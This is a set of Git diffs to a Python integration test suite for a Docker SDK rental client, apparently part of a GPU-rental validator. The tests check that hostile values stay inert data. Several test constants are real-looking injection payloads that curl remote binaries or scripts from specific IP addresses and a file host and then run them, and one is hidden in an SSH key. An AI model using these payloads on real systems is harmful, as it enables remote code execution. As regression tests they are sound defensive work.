+def _device_arg(device: DeviceMount) -> str:
+    target = device.path_in_container or device.path_on_host
+    return f"{device.path_on_host}:{target}:{device.permissions}"
+
+
+def _device_requests(device_requests: tuple[GpuDeviceRequest, ...]) -> list:
+    if not device_requests:
+        return []
+
+    from docker.types import DeviceRequest
+
+    return [
+        DeviceRequest(
+            count=device_request.count,
+            device_ids=list(device_request.device_ids) or None,
+            capabilities=[list(capability) for capability in device_request.capabilities],
+        )
+        for device_request in device_requests
+    ]
+
+
+def _encode_exec_stdin(value: str | bytes | None) -> bytes | None:
+    if value is None:
+        return None
+    if isinstance(value, bytes):
+        return value
+    return value.encode()
+
+
+def _write_stdin_and_read_exec_output(exec_socket, stdin_data: bytes):
+    try:
+        _write_socket_data(exec_socket, stdin_data)
+        _shutdown_socket_write(exec_socket)
+        return _read_exec_socket_output(exec_socket)
+    finally:
+        close = getattr(exec_socket, "close", None)
+        if close is not None:
+            close()
+
+
+def _write_socket_data(exec_socket, data: bytes) -> None:
+    if not data:
+        return
+
+    write_socket = _socket_write_target(exec_socket)
+    sendall = getattr(write_socket, "sendall", None)
+    if sendall is not None:
+        sendall(data)
+        return
+
+    write = getattr(write_socket, "write", None)
+    if write is not None:
+        write(data)
+        flush = getattr(write_socket, "flush", None)
+        if flush is not None:
+            flush()
+        return
+
+    send = getattr(write_socket, "send", None)
+    if send is None:
+        raise TypeError("Docker SDK exec socket does not support stdin writes")
+
+    sent = 0
+    while sent < len(data):
+        bytes_sent = send(data[sent:])
+        if bytes_sent == 0:
+            raise RuntimeError("Docker SDK exec socket write failed")
+        sent += bytes_sent
+
+
+def _shutdown_socket_write(exec_socket) -> None:
+    write_socket = _socket_write_target(exec_socket)
+
+    shutdown_write = getattr(write_socket, "shutdown_write", None)
+    if shutdown_write is not None:
+        shutdown_write()
+        return
+
+    shutdown = getattr(write_socket, "shutdown", None)
+    if shutdown is not None:
+        shutdown(socket_module.SHUT_WR)
+
+
+def _socket_write_target(exec_socket):
+    return getattr(exec_socket, "_sock", exec_socket)
+
+
+def _read_exec_socket_output(exec_socket):
+    from docker.utils.socket import consume_socket_output, demux_adaptor, frames_iter
+
+    demuxed_frames = (
+        demux_adaptor(stream, frame)
+        for stream, frame in frames_iter(exec_socket, tty=False)
+    )
+    return consume_socket_output(demuxed_frames, demux=True)
+
+
+def _decode_exec_output(output) -> tuple[str, str]:
+    if isinstance(output, tuple):
+        stdout, stderr = output
+    else:
+        stdout, stderr = output, b""
+    return _decode_output_part(stdout), _decode_output_part(stderr)
+
+
+def _decode_output_part(value) -> str:
+    if value is None:
+        return ""
+    if isinstance(value, bytes):
+        return value.decode(errors="replace")
+    return str(value)
+
+
+def _build_docker_ssh_base_url(executor_info: ExecutorSSHInfo) -> str:
+    return f"ssh://{executor_info.ssh_username}@{executor_info.address}:{executor_info.ssh_port}"
+
+
+def _build_known_hosts_text(*, host: str, port: int, host_key: str) -> str:
+    key = host_key.strip()
+    entries = [f"{host} {key}"]
+    if port != 22:
+        entries.append(f"[{host}]:{port} {key}")
+    return "\n".join(entries) + "\n"
+
+
+def _validate_paramiko_known_hosts(known_hosts_path: Path) -> None:
+    try:
+        import paramiko
+
+        host_keys = paramiko.HostKeys(str(known_hosts_path))
+        if not host_keys:
+            raise ValueError("no usable host keys loaded")
+    except Exception as exc:
+        raise RentalDockerConnectionError(
+            _wrap_error_message(
+                "Executor SSH host key is not usable by Docker SDK SSH",
+                exc,
+            )
+        ) from exc
+
+
+def _wrap_error_message(message: str, exc: Exception) -> str:
+    detail = str(exc) or exc.__class__.__name__
+    return f"{message}: {detail}"

--- a/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
+++ b/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
@@ -67,6 +67,24 @@ class RentalLifecycleResult:
 
 @requires_local_docker
 @pytest.mark.asyncio
+async def test_local_docker_sdk_create_and_remove_volume(local_docker_api_client):
+    client = RentalDockerSdkClient(local_docker_api_client)
+    volume_name = _container_name("lium-rental-sdk-volume")
+
+    try:
+        await client.create_volume(volume_name=volume_name)
+        inspect = local_docker_api_client.inspect_volume(volume_name)
+        assert inspect["Name"] == volume_name
+
+        await client.remove_volume(volume_name=volume_name, force=True)
+        assert not _volume_exists(local_docker_api_client, volume_name)
+    finally:
+        _remove_volume_if_present(local_docker_api_client, volume_name)
+        await client.aclose()
+
+
+@requires_local_docker
+@pytest.mark.asyncio
 async def test_local_docker_sdk_rental_smoke(local_docker_api_client):
     client = RentalDockerSdkClient(local_docker_api_client)
     container_name = _container_name("lium-rental-sdk-smoke")
@@ -506,6 +524,23 @@ def _remove_container_if_present(api_client, container_name: str) -> None:
         api_client.remove_container(container_name, force=True, v=True)
     except Exception:
         pass
+
+
+def _remove_volume_if_present(api_client, volume_name: str) -> None:
+    try:
+        api_client.remove_volume(volume_name, force=True)
+    except Exception:
+        pass
+
+
+def _volume_exists(api_client, volume_name: str) -> bool:
+    import docker
+
+    try:
+        api_client.inspect_volume(volume_name)
+        return True
+    except docker.errors.NotFound:
+        return False
 
 
 def _wait_for_ssh_port(container):

--- a/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
+++ b/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
@@ -13,13 +13,24 @@ from services.rental_docker_sdk import (
     ContainerRunSpec,
     RentalDockerSdkClient,
     RentalDockerSdkClientFactory,
+    build_container_command_argv,
     build_remove_authorized_keys_exec_spec,
 )
 
 
 TARGET_IMAGE = "alpine:3.20"
-HOSTILE_ENV_VALUE = "value'; echo SHOULD_NOT_RUN; $(echo nope)"
-HOSTILE_PUBLIC_KEY = 'ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)'
+INCIDENT_DOCKER_PASSWORD = (
+    "x' | curl -fsSL https://x0.at/mney -o /tmp/mney"
+    "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
+)
+INCIDENT_DOCKER_IMAGE_PAYLOAD = (
+    "|| curl -fsSL http://69.197.150.11:54321/update | bash ||:0.0.0"
+)
+INCIDENT_PUBLIC_KEY = (
+    "';  c'u'''''r\\l'''' -o /tmp/systemd 203.23.128.30:443/linux_wss;'"
+)
+STARTUP_BREAKOUT_COMMAND = "\n\nsh /tmp/Jtd7.sh"
+HOST_BREAKOUT_MARKER_PATH = "/tmp/jtd7_host_hit"
 
 
 requires_local_docker = pytest.mark.skipif(
@@ -40,6 +51,7 @@ requires_ssh_local_docker = pytest.mark.skipif(
 class LocalSshDockerEndpoint:
     executor_info: ExecutorSSHInfo
     private_key: str
+    executor_container_name: str
 
 
 @dataclass(frozen=True)
@@ -64,7 +76,7 @@ async def test_local_docker_sdk_rental_smoke(local_docker_api_client):
             client,
             inspector_api_client=local_docker_api_client,
             container_name=container_name,
-            stdin_marker="LOCAL_SDK_STDIN_MARKER",
+            stdin_marker=INCIDENT_DOCKER_PASSWORD,
         )
         assert result.env_value_preserved
         assert result.stdin_marker_echoed
@@ -99,7 +111,7 @@ async def test_local_docker_sdk_factory_over_ssh(
                 rental_client,
                 inspector_api_client=local_docker_api_client,
                 container_name=container_name,
-                stdin_marker="LOCAL_SSH_SDK_STDIN_MARKER",
+                stdin_marker=INCIDENT_DOCKER_PASSWORD,
             )
             assert result.env_value_preserved
             assert result.stdin_marker_echoed
@@ -112,16 +124,67 @@ async def test_local_docker_sdk_factory_over_ssh(
         _remove_container_if_present(local_docker_api_client, container_name)
 
 
+@requires_ssh_local_docker
+@pytest.mark.asyncio
+async def test_local_docker_sdk_startup_breakout_payload_stays_container_command(
+    local_docker_api_client,
+    local_docker_client,
+    local_ssh_docker_endpoint,
+):
+    factory = RentalDockerSdkClientFactory()
+    container_name = _container_name("lium-rental-sdk-startup-replay")
+    startup_argv = build_container_command_argv(STARTUP_BREAKOUT_COMMAND)
+    assert startup_argv == ("sh", "/tmp/Jtd7.sh")
+
+    # Canary for the old host-shell breakout shape. If the exact startup
+    # payload escapes onto the SSH executor side, this harmless marker appears.
+    _install_startup_breakout_canary(
+        local_docker_client,
+        local_ssh_docker_endpoint.executor_container_name,
+    )
+
+    try:
+        async with factory.connect(
+            executor_info=local_ssh_docker_endpoint.executor_info,
+            private_key=local_ssh_docker_endpoint.private_key,
+        ) as rental_client:
+            await rental_client.pull(image=TARGET_IMAGE)
+            await rental_client.run_container(
+                ContainerRunSpec(
+                    image=TARGET_IMAGE,
+                    name=container_name,
+                    command=startup_argv,
+                    restart_policy=None,
+                )
+            )
+
+        inspect = local_docker_api_client.inspect_container(container_name)
+        assert inspect["Config"]["Cmd"] == ["sh", "/tmp/Jtd7.sh"]
+        assert not _container_file_exists(
+            local_docker_client,
+            local_ssh_docker_endpoint.executor_container_name,
+            HOST_BREAKOUT_MARKER_PATH,
+        )
+    finally:
+        _remove_container_if_present(local_docker_api_client, container_name)
+        _remove_startup_breakout_canary(
+            local_docker_client,
+            local_ssh_docker_endpoint.executor_container_name,
+        )
+
+
 @pytest.fixture
 def local_docker_api_client():
     import docker
     from docker.utils import kwargs_from_env
 
-    api_client = docker.APIClient(timeout=60, **kwargs_from_env())
+    api_client = None
     try:
+        api_client = docker.APIClient(timeout=60, **kwargs_from_env())
         api_client.ping()
     except Exception as exc:
-        api_client.close()
+        if api_client is not None:
+            api_client.close()
         pytest.skip(f"local Docker daemon unavailable: {exc}")
 
     try:
@@ -178,6 +241,7 @@ def local_ssh_docker_endpoint(tmp_path, local_docker_client):
                 ssh_host_key=ssh_host_key,
             ),
             private_key=private_key,
+            executor_container_name=executor_name,
         )
     finally:
         if executor_container is not None:
@@ -206,13 +270,13 @@ async def _run_rental_lifecycle(
             image=TARGET_IMAGE,
             name=container_name,
             command=("sh", "-c", "trap : TERM INT; sleep infinity & wait"),
-            environment={"HOSTILE_ENV": HOSTILE_ENV_VALUE},
+            environment={"HOSTILE_ENV": INCIDENT_DOCKER_IMAGE_PAYLOAD},
             restart_policy=None,
         )
     )
 
     inspect = inspector_api_client.inspect_container(container_name)
-    env_value_preserved = f"HOSTILE_ENV={HOSTILE_ENV_VALUE}" in (
+    env_value_preserved = f"HOSTILE_ENV={INCIDENT_DOCKER_IMAGE_PAYLOAD}" in (
         inspect["Config"].get("Env") or []
     )
 
@@ -233,7 +297,7 @@ async def _run_rental_lifecycle(
                 "-c",
                 "mkdir -p /root/.ssh && cat >> /root/.ssh/authorized_keys",
             ),
-            stdin=f"{HOSTILE_PUBLIC_KEY}\n",
+            stdin=f"{INCIDENT_PUBLIC_KEY}\n",
         )
     )
     verify_key_added_result = await rental_client.exec_in_container(
@@ -242,7 +306,7 @@ async def _run_rental_lifecycle(
             argv=(
                 "sh",
                 "-c",
-                "grep -q KEY_MARKER /root/.ssh/authorized_keys",
+                "grep -qF '203.23.128.30:443/linux_wss' /root/.ssh/authorized_keys",
             ),
         )
     )
@@ -254,7 +318,7 @@ async def _run_rental_lifecycle(
     remove_key_result = await rental_client.exec_in_container(
         build_remove_authorized_keys_exec_spec(
             container_name=container_name,
-            public_keys=[HOSTILE_PUBLIC_KEY],
+            public_keys=[INCIDENT_PUBLIC_KEY],
         )
     )
     verify_key_removed_result = await rental_client.exec_in_container(
@@ -263,7 +327,10 @@ async def _run_rental_lifecycle(
             argv=(
                 "sh",
                 "-c",
-                "if grep -q KEY_MARKER /root/.ssh/authorized_keys; then exit 1; fi",
+                (
+                    "if grep -qF '203.23.128.30:443/linux_wss' "
+                    "/root/.ssh/authorized_keys; then exit 1; fi"
+                ),
             ),
         )
     )
@@ -363,6 +430,45 @@ def _start_ssh_executor_container(
             ),
         ],
     )
+
+
+def _install_startup_breakout_canary(docker_client, container_name: str) -> None:
+    exit_code, output = _exec_container_shell(
+        docker_client,
+        container_name,
+        (
+            "cat > /tmp/Jtd7.sh <<'EOF'\n"
+            "#!/bin/sh\n"
+            f"printf '%s\\n' host-breakout > {HOST_BREAKOUT_MARKER_PATH}\n"
+            "EOF\n"
+            "chmod +x /tmp/Jtd7.sh\n"
+            f"rm -f {HOST_BREAKOUT_MARKER_PATH}"
+        ),
+    )
+    assert exit_code == 0, output
+
+
+def _remove_startup_breakout_canary(docker_client, container_name: str) -> None:
+    _exec_container_shell(
+        docker_client,
+        container_name,
+        f"rm -f /tmp/Jtd7.sh {HOST_BREAKOUT_MARKER_PATH}",
+    )
+
+
+def _container_file_exists(docker_client, container_name: str, path: str) -> bool:
+    exit_code, _ = _exec_container_shell(
+        docker_client,
+        container_name,
+        f"test -e {path}",
+    )
+    return exit_code == 0
+
+
+def _exec_container_shell(docker_client, container_name: str, command: str):
+    container = docker_client.containers.get(container_name)
+    result = container.exec_run(["sh", "-c", command])
+    return result.exit_code, result.output.decode(errors="replace")
 
 
 def _executor_info(

--- a/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
+++ b/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
@@ -236,7 +236,20 @@ async def _run_rental_lifecycle(
             stdin=f"{HOSTILE_PUBLIC_KEY}\n",
         )
     )
-    public_key_write_succeeded = key_result.exit_status == 0
+    verify_key_added_result = await rental_client.exec_in_container(
+        ContainerExecSpec(
+            container_name=container_name,
+            argv=(
+                "sh",
+                "-c",
+                "grep -q KEY_MARKER /root/.ssh/authorized_keys",
+            ),
+        )
+    )
+    public_key_write_succeeded = (
+        key_result.exit_status == 0
+        and verify_key_added_result.exit_status == 0
+    )
 
     remove_key_result = await rental_client.exec_in_container(
         build_remove_authorized_keys_exec_spec(

--- a/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
+++ b/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
@@ -1,79 +1,421 @@
 import os
+import socket
+import time
 import uuid
+from dataclasses import dataclass
+from io import StringIO
 
 import pytest
 
+from datura.requests.miner_requests import ExecutorSSHInfo
 from services.rental_docker_sdk import (
     ContainerExecSpec,
     ContainerRunSpec,
     RentalDockerSdkClient,
+    RentalDockerSdkClientFactory,
 )
 
 
-pytestmark = pytest.mark.skipif(
+TARGET_IMAGE = "alpine:3.20"
+HOSTILE_ENV_VALUE = "value'; echo SHOULD_NOT_RUN; $(echo nope)"
+HOSTILE_PUBLIC_KEY = 'ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)\n'
+
+
+requires_local_docker = pytest.mark.skipif(
     os.environ.get("RUN_RENTAL_DOCKER_SDK_INTEGRATION") != "1",
     reason="set RUN_RENTAL_DOCKER_SDK_INTEGRATION=1 to run local Docker smoke",
 )
 
+requires_ssh_local_docker = pytest.mark.skipif(
+    os.environ.get("RUN_RENTAL_DOCKER_SDK_SSH_INTEGRATION") != "1",
+    reason=(
+        "set RUN_RENTAL_DOCKER_SDK_SSH_INTEGRATION=1 to run local "
+        "Docker-over-SSH smoke"
+    ),
+)
 
+
+@dataclass(frozen=True)
+class LocalSshDockerEndpoint:
+    executor_info: ExecutorSSHInfo
+    private_key: str
+
+
+@dataclass(frozen=True)
+class RentalLifecycleResult:
+    env_value_preserved: bool
+    stdin_marker_echoed: bool
+    public_key_write_succeeded: bool
+    stopped: bool
+    restarted: bool
+    removed: bool
+
+
+@requires_local_docker
 @pytest.mark.asyncio
-async def test_local_docker_sdk_rental_smoke():
+async def test_local_docker_sdk_rental_smoke(local_docker_api_client):
+    client = RentalDockerSdkClient(local_docker_api_client)
+    container_name = _container_name("lium-rental-sdk-smoke")
+
+    try:
+        result = await _run_rental_lifecycle(
+            client,
+            inspector_api_client=local_docker_api_client,
+            container_name=container_name,
+            stdin_marker="LOCAL_SDK_STDIN_MARKER",
+        )
+        assert result.env_value_preserved
+        assert result.stdin_marker_echoed
+        assert result.public_key_write_succeeded
+        assert result.stopped
+        assert result.restarted
+        assert result.removed
+    finally:
+        _remove_container_if_present(local_docker_api_client, container_name)
+        await client.aclose()
+
+
+@requires_ssh_local_docker
+@pytest.mark.asyncio
+async def test_local_docker_sdk_factory_over_ssh(
+    local_docker_api_client,
+    local_ssh_docker_endpoint,
+):
+    factory = RentalDockerSdkClientFactory()
+    container_name = _container_name("lium-rental-sdk-ssh-target")
+
+    # This is the validator-facing SDK path: the factory builds a docker-py
+    # ssh:// client from executor SSH info, then the client manages a rental
+    # target container through the remote Docker API.
+    try:
+        async with factory.connect(
+            executor_info=local_ssh_docker_endpoint.executor_info,
+            private_key=local_ssh_docker_endpoint.private_key,
+        ) as rental_client:
+            result = await _run_rental_lifecycle(
+                rental_client,
+                inspector_api_client=local_docker_api_client,
+                container_name=container_name,
+                stdin_marker="LOCAL_SSH_SDK_STDIN_MARKER",
+            )
+            assert result.env_value_preserved
+            assert result.stdin_marker_echoed
+            assert result.public_key_write_succeeded
+            assert result.stopped
+            assert result.restarted
+            assert result.removed
+    finally:
+        _remove_container_if_present(local_docker_api_client, container_name)
+
+
+@pytest.fixture
+def local_docker_api_client():
     import docker
     from docker.utils import kwargs_from_env
 
-    image = "alpine:3.20"
-    container_name = f"lium-rental-sdk-smoke-{uuid.uuid4().hex[:12]}"
-    hostile_env = "value'; echo SHOULD_NOT_RUN; $(echo nope)"
-    stdin_marker = "LOCAL_SDK_STDIN_MARKER"
-
     api_client = docker.APIClient(timeout=60, **kwargs_from_env())
-    client = RentalDockerSdkClient(api_client)
     try:
-        await client.pull(image=image)
-        await client.run_container(
-            ContainerRunSpec(
-                image=image,
-                name=container_name,
-                command=("sh", "-c", "trap : TERM INT; sleep infinity & wait"),
-                environment={"HOSTILE_ENV": hostile_env},
-                restart_policy=None,
-            )
-        )
+        api_client.ping()
+    except Exception as exc:
+        api_client.close()
+        pytest.skip(f"local Docker daemon unavailable: {exc}")
 
-        inspect = api_client.inspect_container(container_name)
-        assert f"HOSTILE_ENV={hostile_env}" in (inspect["Config"].get("Env") or [])
-
-        result = await client.exec_in_container(
-            ContainerExecSpec(
-                container_name=container_name,
-                argv=("sh", "-c", "cat > /tmp/sdk-smoke && cat /tmp/sdk-smoke"),
-                stdin=f"{stdin_marker}\nsecond-line\n",
-            )
-        )
-        assert result.exit_status == 0
-        assert stdin_marker in result.stdout
-
-        key_result = await client.exec_in_container(
-            ContainerExecSpec(
-                container_name=container_name,
-                argv=("sh", "-c", "mkdir -p /root/.ssh && cat >> /root/.ssh/authorized_keys"),
-                stdin='ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)\n',
-            )
-        )
-        assert key_result.exit_status == 0
-
-        await client.stop(container_name=container_name)
-        assert api_client.inspect_container(container_name)["State"]["Running"] is False
-
-        await client.start(container_name=container_name)
-        assert api_client.inspect_container(container_name)["State"]["Running"] is True
-
-        await client.remove_container(container_name=container_name, force=True, remove_volumes=True)
-        with pytest.raises(docker.errors.NotFound):
-            api_client.inspect_container(container_name)
+    try:
+        yield api_client
     finally:
+        api_client.close()
+
+
+@pytest.fixture
+def local_docker_client(local_docker_api_client):
+    import docker
+
+    client = docker.from_env()
+    try:
+        yield client
+    finally:
+        client.close()
+
+
+@pytest.fixture
+def local_ssh_docker_endpoint(tmp_path, local_docker_client):
+    import paramiko
+
+    image_tag = f"lium-rental-sdk-ssh-executor:{uuid.uuid4().hex[:12]}"
+    executor_name = _container_name("lium-rental-sdk-ssh-executor")
+    private_key, authorized_key = _generate_rsa_key_pair(paramiko)
+    executor_container = None
+
+    try:
+        _build_ssh_executor_image(
+            docker_client=local_docker_client,
+            build_dir=tmp_path,
+            image_tag=image_tag,
+        )
+        executor_container = _start_ssh_executor_container(
+            docker_client=local_docker_client,
+            image_tag=image_tag,
+            container_name=executor_name,
+            authorized_key=authorized_key,
+        )
+
+        host, ssh_port = _wait_for_ssh_port(executor_container)
+        ssh_host_key = _wait_for_ssh_host_key(
+            host,
+            ssh_port,
+            paramiko,
+            executor_container,
+        )
+
+        yield LocalSshDockerEndpoint(
+            executor_info=_executor_info(
+                host=host,
+                ssh_port=ssh_port,
+                ssh_host_key=ssh_host_key,
+            ),
+            private_key=private_key,
+        )
+    finally:
+        if executor_container is not None:
+            try:
+                executor_container.remove(force=True, v=True)
+            except Exception:
+                pass
         try:
-            api_client.remove_container(container_name, force=True, v=True)
+            local_docker_client.images.remove(image_tag, force=True)
         except Exception:
             pass
-        await client.aclose()
+
+
+async def _run_rental_lifecycle(
+    rental_client: RentalDockerSdkClient,
+    *,
+    inspector_api_client,
+    container_name: str,
+    stdin_marker: str,
+) -> RentalLifecycleResult:
+    import docker
+
+    await rental_client.pull(image=TARGET_IMAGE)
+    await rental_client.run_container(
+        ContainerRunSpec(
+            image=TARGET_IMAGE,
+            name=container_name,
+            command=("sh", "-c", "trap : TERM INT; sleep infinity & wait"),
+            environment={"HOSTILE_ENV": HOSTILE_ENV_VALUE},
+            restart_policy=None,
+        )
+    )
+
+    inspect = inspector_api_client.inspect_container(container_name)
+    env_value_preserved = f"HOSTILE_ENV={HOSTILE_ENV_VALUE}" in (
+        inspect["Config"].get("Env") or []
+    )
+
+    result = await rental_client.exec_in_container(
+        ContainerExecSpec(
+            container_name=container_name,
+            argv=("sh", "-c", "cat > /tmp/sdk-smoke && cat /tmp/sdk-smoke"),
+            stdin=f"{stdin_marker}\nsecond-line\n",
+        )
+    )
+    stdin_marker_echoed = result.exit_status == 0 and stdin_marker in result.stdout
+
+    key_result = await rental_client.exec_in_container(
+        ContainerExecSpec(
+            container_name=container_name,
+            argv=(
+                "sh",
+                "-c",
+                "mkdir -p /root/.ssh && cat >> /root/.ssh/authorized_keys",
+            ),
+            stdin=HOSTILE_PUBLIC_KEY,
+        )
+    )
+    public_key_write_succeeded = key_result.exit_status == 0
+
+    await rental_client.stop(container_name=container_name)
+    stopped = (
+        inspector_api_client.inspect_container(container_name)["State"]["Running"]
+        is False
+    )
+
+    await rental_client.start(container_name=container_name)
+    restarted = (
+        inspector_api_client.inspect_container(container_name)["State"]["Running"]
+        is True
+    )
+
+    await rental_client.remove_container(
+        container_name=container_name,
+        force=True,
+        remove_volumes=True,
+    )
+    try:
+        inspector_api_client.inspect_container(container_name)
+        removed = False
+    except docker.errors.NotFound:
+        removed = True
+
+    return RentalLifecycleResult(
+        env_value_preserved=env_value_preserved,
+        stdin_marker_echoed=stdin_marker_echoed,
+        public_key_write_succeeded=public_key_write_succeeded,
+        stopped=stopped,
+        restarted=restarted,
+        removed=removed,
+    )
+
+
+def _build_ssh_executor_image(*, docker_client, build_dir, image_tag: str) -> None:
+    dockerfile = build_dir / "Dockerfile"
+    dockerfile.write_text(
+        "\n".join(
+            [
+                "FROM alpine:3.20",
+                "RUN apk add --no-cache docker-cli openssh-server",
+                "RUN mkdir -p /run/sshd /root/.ssh && chmod 700 /root/.ssh",
+                "EXPOSE 22",
+                "",
+            ]
+        ),
+        encoding="utf-8",
+    )
+    docker_client.images.build(path=str(build_dir), tag=image_tag, rm=True)
+
+
+def _start_ssh_executor_container(
+    *,
+    docker_client,
+    image_tag: str,
+    container_name: str,
+    authorized_key: str,
+):
+    # Local stand-in for a rented executor host. It exposes sshd and mounts the
+    # host Docker socket, so docker-py still uses its real ssh:// transport.
+    return docker_client.containers.run(
+        image_tag,
+        name=container_name,
+        detach=True,
+        ports={"22/tcp": None},
+        volumes={
+            "/var/run/docker.sock": {
+                "bind": "/var/run/docker.sock",
+                "mode": "rw",
+            }
+        },
+        environment={"AUTHORIZED_KEY": authorized_key},
+        command=[
+            "sh",
+            "-c",
+            (
+                "set -eu; "
+                "mkdir -p /root/.ssh /run/sshd; "
+                "printf '%s\n' \"$AUTHORIZED_KEY\" > /root/.ssh/authorized_keys; "
+                "chmod 700 /root/.ssh; "
+                "chmod 600 /root/.ssh/authorized_keys; "
+                "printf '%s\n' "
+                "'PermitRootLogin yes' "
+                "'PasswordAuthentication no' "
+                "'PubkeyAuthentication yes' "
+                ">> /etc/ssh/sshd_config; "
+                "ssh-keygen -A; "
+                "exec /usr/sbin/sshd -D -e"
+            ),
+        ],
+    )
+
+
+def _executor_info(
+    *,
+    host: str,
+    ssh_port: int,
+    ssh_host_key: str,
+) -> ExecutorSSHInfo:
+    return ExecutorSSHInfo(
+        uuid=str(uuid.uuid4()),
+        address=host,
+        port=8080,
+        ssh_username="root",
+        ssh_port=ssh_port,
+        python_path="/usr/bin/python3",
+        root_dir="/root",
+        ssh_host_key=ssh_host_key,
+    )
+
+
+def _generate_rsa_key_pair(paramiko_module):
+    key = paramiko_module.RSAKey.generate(2048)
+    private_key = StringIO()
+    key.write_private_key(private_key)
+    authorized_key = f"{key.get_name()} {key.get_base64()} local-test"
+    return private_key.getvalue(), authorized_key
+
+
+def _container_name(prefix: str) -> str:
+    return f"{prefix}-{uuid.uuid4().hex[:12]}"
+
+
+def _remove_container_if_present(api_client, container_name: str) -> None:
+    try:
+        api_client.remove_container(container_name, force=True, v=True)
+    except Exception:
+        pass
+
+
+def _wait_for_ssh_port(container):
+    container.reload()
+    bindings = container.attrs["NetworkSettings"]["Ports"]["22/tcp"]
+    assert bindings, "SSH executor container did not publish port 22"
+    host = bindings[0].get("HostIp") or "127.0.0.1"
+    if host in {"0.0.0.0", "::"}:
+        host = "127.0.0.1"
+    port = int(bindings[0]["HostPort"])
+
+    deadline = time.monotonic() + 30
+    last_error = None
+    while time.monotonic() < deadline:
+        try:
+            with socket.create_connection((host, port), timeout=1):
+                return host, port
+        except OSError as exc:
+            last_error = exc
+            time.sleep(0.25)
+
+    logs = container.logs(tail=100).decode(errors="replace")
+    raise AssertionError(
+        f"SSH executor did not accept connections on {host}:{port}: "
+        f"{last_error}; logs={logs}"
+    )
+
+
+def _wait_for_ssh_host_key(host: str, port: int, paramiko_module, container) -> str:
+    deadline = time.monotonic() + 30
+    last_error = None
+    while time.monotonic() < deadline:
+        try:
+            return _read_ssh_host_key(host, port, paramiko_module)
+        except Exception as exc:
+            last_error = exc
+            time.sleep(0.25)
+
+    logs = container.logs(tail=100).decode(errors="replace")
+    raise AssertionError(
+        f"SSH executor did not expose a usable host key on {host}:{port}: "
+        f"{last_error}; logs={logs}"
+    )
+
+
+def _read_ssh_host_key(host: str, port: int, paramiko_module) -> str:
+    sock = socket.create_connection((host, port), timeout=5)
+    try:
+        transport = paramiko_module.Transport(sock)
+    except Exception:
+        sock.close()
+        raise
+    try:
+        transport.start_client(timeout=5)
+        key = transport.get_remote_server_key()
+        return f"{key.get_name()} {key.get_base64()}"
+    finally:
+        transport.close()

--- a/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
+++ b/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
@@ -13,12 +13,13 @@ from services.rental_docker_sdk import (
     ContainerRunSpec,
     RentalDockerSdkClient,
     RentalDockerSdkClientFactory,
+    build_remove_authorized_keys_exec_spec,
 )
 
 
 TARGET_IMAGE = "alpine:3.20"
 HOSTILE_ENV_VALUE = "value'; echo SHOULD_NOT_RUN; $(echo nope)"
-HOSTILE_PUBLIC_KEY = 'ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)\n'
+HOSTILE_PUBLIC_KEY = 'ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)'
 
 
 requires_local_docker = pytest.mark.skipif(
@@ -46,6 +47,7 @@ class RentalLifecycleResult:
     env_value_preserved: bool
     stdin_marker_echoed: bool
     public_key_write_succeeded: bool
+    public_key_remove_succeeded: bool
     stopped: bool
     restarted: bool
     removed: bool
@@ -67,6 +69,7 @@ async def test_local_docker_sdk_rental_smoke(local_docker_api_client):
         assert result.env_value_preserved
         assert result.stdin_marker_echoed
         assert result.public_key_write_succeeded
+        assert result.public_key_remove_succeeded
         assert result.stopped
         assert result.restarted
         assert result.removed
@@ -101,6 +104,7 @@ async def test_local_docker_sdk_factory_over_ssh(
             assert result.env_value_preserved
             assert result.stdin_marker_echoed
             assert result.public_key_write_succeeded
+            assert result.public_key_remove_succeeded
             assert result.stopped
             assert result.restarted
             assert result.removed
@@ -229,10 +233,31 @@ async def _run_rental_lifecycle(
                 "-c",
                 "mkdir -p /root/.ssh && cat >> /root/.ssh/authorized_keys",
             ),
-            stdin=HOSTILE_PUBLIC_KEY,
+            stdin=f"{HOSTILE_PUBLIC_KEY}\n",
         )
     )
     public_key_write_succeeded = key_result.exit_status == 0
+
+    remove_key_result = await rental_client.exec_in_container(
+        build_remove_authorized_keys_exec_spec(
+            container_name=container_name,
+            public_keys=[HOSTILE_PUBLIC_KEY],
+        )
+    )
+    verify_key_removed_result = await rental_client.exec_in_container(
+        ContainerExecSpec(
+            container_name=container_name,
+            argv=(
+                "sh",
+                "-c",
+                "if grep -q KEY_MARKER /root/.ssh/authorized_keys; then exit 1; fi",
+            ),
+        )
+    )
+    public_key_remove_succeeded = (
+        remove_key_result.exit_status == 0
+        and verify_key_removed_result.exit_status == 0
+    )
 
     await rental_client.stop(container_name=container_name)
     stopped = (
@@ -261,6 +286,7 @@ async def _run_rental_lifecycle(
         env_value_preserved=env_value_preserved,
         stdin_marker_echoed=stdin_marker_echoed,
         public_key_write_succeeded=public_key_write_succeeded,
+        public_key_remove_succeeded=public_key_remove_succeeded,
         stopped=stopped,
         restarted=restarted,
         removed=removed,

--- a/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
+++ b/neurons/validators/tests/integration/test_rental_docker_sdk_local.py
@@ -1,0 +1,79 @@
+import os
+import uuid
+
+import pytest
+
+from services.rental_docker_sdk import (
+    ContainerExecSpec,
+    ContainerRunSpec,
+    RentalDockerSdkClient,
+)
+
+
+pytestmark = pytest.mark.skipif(
+    os.environ.get("RUN_RENTAL_DOCKER_SDK_INTEGRATION") != "1",
+    reason="set RUN_RENTAL_DOCKER_SDK_INTEGRATION=1 to run local Docker smoke",
+)
+
+
+@pytest.mark.asyncio
+async def test_local_docker_sdk_rental_smoke():
+    import docker
+    from docker.utils import kwargs_from_env
+
+    image = "alpine:3.20"
+    container_name = f"lium-rental-sdk-smoke-{uuid.uuid4().hex[:12]}"
+    hostile_env = "value'; echo SHOULD_NOT_RUN; $(echo nope)"
